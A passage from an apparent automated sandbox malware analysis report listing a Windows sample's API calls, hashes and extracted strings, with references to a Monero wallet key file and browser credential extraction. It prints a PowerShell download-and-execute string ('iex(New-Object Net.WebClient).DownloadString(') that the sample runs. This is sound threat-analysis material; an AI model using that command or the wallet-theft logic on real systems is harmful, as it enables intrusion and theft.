                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                          • Instruction ID: 9a95b52d523c6463e0ecba1c03b3eed4da58b583dc31fff527696cd2b9e4f2c8
                          • Opcode Fuzzy Hash: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                          • Instruction Fuzzy Hash: 2821F8B1A0022CABDB24DF54DC85FE9B3B8FB48700F10C598E649A6140DF756A85CFA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF76A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF76AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0082BC68,00000000,00020119,00000000), ref: 00DF76DD
                          • RegQueryValueExA.ADVAPI32(00000000,00840468,00000000,00000000,?,000000FF), ref: 00DF76FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF7708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                          • Instruction ID: 3b050dab3a5dd4ec0e9a34dacac8663191723e5988f8ddbd420573f6f31512cd
                          • Opcode Fuzzy Hash: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                          • Instruction Fuzzy Hash: AE0144B5B04209FBD720EFE4DC49FBA77B8EB44701F208454FB45D7584DAB599008B60
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0082BC68,00000000,00020119,00DF76B9), ref: 00DF775B
                          • RegQueryValueExA.ADVAPI32(00DF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00DF777A
                          • RegCloseKey.ADVAPI32(00DF76B9), ref: 00DF7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                          • Instruction ID: cad6b0de3a6ae4babb2dd58647a596255922eca599a1f25e7c66af966ef3a1bc
                          • Opcode Fuzzy Hash: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                          • Instruction Fuzzy Hash: 550144B5B40308FBDB20DFE0DC49FAEB7B8EB44701F108555FA45A7285DAB556008B61
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                          • LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                          • Instruction ID: 629248a6fa37975576a41ee3cefeb05bd4120b76f05b2f5e3e9a103db64f90c4
                          • Opcode Fuzzy Hash: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                          • Instruction Fuzzy Hash: 15313EB4A00209EFDB24DFA5D995BAEB7B5FF48340F108168E905A7284D779A941CFB0
                          APIs
                          • lstrcat.KERNEL32(?,00840720), ref: 00DF47DB
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4801
                          • lstrcat.KERNEL32(?,?), ref: 00DF4820
                          • lstrcat.KERNEL32(?,?), ref: 00DF4834
                          • lstrcat.KERNEL32(?,0082A4C8), ref: 00DF4847
                          • lstrcat.KERNEL32(?,?), ref: 00DF485B
                          • lstrcat.KERNEL32(?,0083F2C8), ref: 00DF486F
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                            • Part of subcall function 00DF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                            • Part of subcall function 00DF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                            • Part of subcall function 00DF4570: wsprintfA.USER32 ref: 00DF45A6
                            • Part of subcall function 00DF4570: FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                          • Instruction ID: a8196d71f20cacd9a972eb84cf7e8b15ab931e3127ee56da502ef8dd83bfeb9b
                          • Opcode Fuzzy Hash: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                          • Instruction Fuzzy Hash: 3E3152B6A0021C97CB20FBA0DC85EFD7378AB58704F408589F35996085EEB5D7898FB5
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF2D85
                          Strings
                          • ')", xrefs: 00DF2CB3
                          • <, xrefs: 00DF2D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00DF2D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00DF2CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                          • Instruction ID: 601b1ab582eda737c4b1be2f94d404c453d58ce39ac5b4f53f90c65153a3ea3e
                          • Opcode Fuzzy Hash: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                          • Instruction Fuzzy Hash: B141DAB180021C9ADB14EBA4C892BFDB774EF10340F55C029E60AB7195DFB46A4ACFB1
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9F41
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 40692de965b13a369c585283992432d8a5645db0f086b06836a747dd90362723
                          • Instruction ID: 4ba48c3d5070fa1559d82c7e28588712a780276f7f343744f2f267bd889ca6bf
                          • Opcode Fuzzy Hash: 40692de965b13a369c585283992432d8a5645db0f086b06836a747dd90362723
                          • Instruction Fuzzy Hash: E1610A71A002489BDB24EFA9CC96FED7775EF44340F048118FA0A6B195DB74AA45CB72
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0083F088,00000000,00020119,?), ref: 00DF40F4
                          • RegQueryValueExA.ADVAPI32(?,00840690,00000000,00000000,00000000,000000FF), ref: 00DF4118
                          • RegCloseKey.ADVAPI32(?), ref: 00DF4122
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4147
                          • lstrcat.KERNEL32(?,008407C8), ref: 00DF415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                          • Instruction ID: 802eb676c489b45dc280f04f48f239d8374b20b1c917d61607c1c4ab0f3727f6
                          • Opcode Fuzzy Hash: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                          • Instruction Fuzzy Hash: 264146B6A00108ABDB34EFA0DC46FFE737DAB88300F508558B75557185EE759B888BB1
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00DF696C
                          • sscanf.NTDLL ref: 00DF6999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69C0
                          • ExitProcess.KERNEL32 ref: 00DF69DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                          • Instruction ID: e94acc2b30b8bcef802bbdfbf79679f3e65cb68ea248a28e15d8aba097dd8286
                          • Opcode Fuzzy Hash: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                          • Instruction Fuzzy Hash: 2F21EAB5D0020CABCF14EFE8D945AEEB7B5FF48300F14852AE506E3644EB759605CB69
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0082BBC0,00000000,00020119,?), ref: 00DF7E5E
                          • RegQueryValueExA.ADVAPI32(?,0083F028,00000000,00000000,000000FF,000000FF), ref: 00DF7E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00DF7E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                          • Instruction ID: 8cfc7337b9b1ccb971056ab8c4b1b9f00ede266f596c0c127521baf1a729f79a
                          • Opcode Fuzzy Hash: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                          • Instruction Fuzzy Hash: 8C118FB1A44209EBD724CF94DD4AFBBBBB8FB44710F20811AF755A7684DB7958008BA0
                          APIs
                          • StrStrA.SHLWAPI(00840438,?,?,?,00DF140C,?,00840438,00000000), ref: 00DF926C
                          • lstrcpyn.KERNEL32(0102AB88,00840438,00840438,?,00DF140C,?,00840438), ref: 00DF9290
                          • lstrlen.KERNEL32(?,?,00DF140C,?,00840438), ref: 00DF92A7
                          • wsprintfA.USER32 ref: 00DF92C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                          • Instruction ID: 40c51b99f1894864d777b22474b0526c01cf0531ced158a6fb179e6848f95870
                          • Opcode Fuzzy Hash: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                          • Instruction Fuzzy Hash: F0011E75600108FFCB14DFECC998EAE7BB9FB48350F108548F9499B605CA35AA40DBA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
